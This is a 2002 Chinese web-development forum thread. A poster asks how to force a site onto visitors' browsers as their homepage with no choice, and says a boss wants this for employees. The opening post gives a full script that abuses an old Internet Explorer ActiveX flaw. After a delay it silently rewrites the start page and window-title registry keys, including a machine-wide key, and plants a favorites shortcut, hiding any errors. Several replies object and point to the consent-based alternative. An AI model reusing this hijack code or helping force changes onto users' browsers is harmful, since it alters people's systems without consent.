急急急急急急急急急!!!!

free_doctor 2002-09-28 11:01:31
有没有不用下面方法自动设置为首页的方法呀?????
在线等!!!

<SCRIPT>
<!--//BEGIN
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}

function enman()
{

try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try{


///////////////////////////////////////主页///////////(本程序由“东北人家の好朋友工作室”http://helpyou2001.126.com提供)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://go4.163.com/eastnorthman/index2.htm");
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chga=general; expiresa=" + expdate.toGMTString() + "; path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";

if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}


//////////////////////////////////////////收藏夹///////////(本程序由“东北人家の好朋友工作室”http://helpyou2001.126.com提供)
AddFavLnk(loc, "东北人家の好朋友工作室http://helpyou2001.126.com", "http://go4.163.com/eastnorthman/index2.htm");


////////////////////////////////////////更改title///////////(本程序由“东北人家の好朋友工作室”http://helpyou2001.126.com提供)
if (document.cookie.indexOf("bChg") == -1)
{
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "欢迎访问---->> http://helpyou2001.126.com");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "欢迎访问---->> http://helpyou2001.126.com");

var expdate = new Date((new Date()).getTime() + (1));
document.cookie="bChg=general; bexpires=" + expdate.toGMTString() + "; path=/;"
}

}

catch(e){ }
}
catch(e){ }
}

function init(){
setTimeout("enman()", 10000);
}
init();
//END-->
</SCRIPT>
...全文
32 14 打赏 收藏 转发到动态 举报
写回复
用AI写文章
14 条回复
切换为时间正序
请发表友善的回复…
发表回复
bencalie 2002-09-28
  • 打赏
  • 举报
回复
何必呢?一个网站如果强加某些东西给浏览者,不是好的做法
LvYou 2002-09-28
  • 打赏
  • 举报
回复
这样做只能把人气跑.我要是遇到这种网站,绝对放进黑名单.

我的IE随时打补丁,就是为了防这种居心不良的网站.
free_doctor 2002-09-28
  • 打赏
  • 举报
回复
人呢?都吃饭去了~?
:(
free_doctor 2002-09-28
  • 打赏
  • 举报
回复
我知道这样子可以在load的时候跳出是否设为首页的对话框,问题是,我现在不允许他选择,希望可以给个默认值为“是”设为首页的代码~!

Reker熊 2002-09-28
  • 打赏
  • 举报
回复
up
LvYou 2002-09-28
  • 打赏
  • 举报
回复
<body onload="hp.setHomePage('http://www.csdn.net/')">

<font id=hp style="behavior:url(#default#homepage)"

onclick="setHomePage('http://www.csdn.net/')">设为首页</font>


</body>
LvYou 2002-09-28
  • 打赏
  • 举报
回复
<font style="behavior:url(#default#homepage)"

onclick="setHomePage('http://www.csdn.net/')">设为首页</font>
free_doctor 2002-09-28
  • 打赏
  • 举报
回复
我知道这个方法不好所以才找别的啦~,去过很多地方,都说没有~!!!
退而求其次的说,或者是在主页load的时候自动跳出是否要设为首页的对话框,然后给个默认值再设定也行呀~!!!
yonghengdizhen 2002-09-28
  • 打赏
  • 举报
回复
没有...

暂时没有...
孟子E章 2002-09-28
  • 打赏
  • 举报
回复
那是 IE的Bug,现在已经修复,你不要再用了。查毒软件会查出来的。写注册表属于不安全操作
free_doctor 2002-09-28
  • 打赏
  • 举报
回复
没人????
free_doctor 2002-09-28
  • 打赏
  • 举报
回复
都吃完饭了吧,怎么还是没人呀~!?
free_doctor 2002-09-28
  • 打赏
  • 举报
回复
自己up~~~!!!!人都到哪里去了啦~!???
free_doctor 2002-09-28
  • 打赏
  • 举报
回复
拜托各位啦~,我不是要在做什么个人主页的时候用的。
是老板规定每个员工都必须上一个网站,他希望所有员工在访问过这个网站后就将首页都设定为这个网站,我只是需要帮他实现这个功能而已。

87,923

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧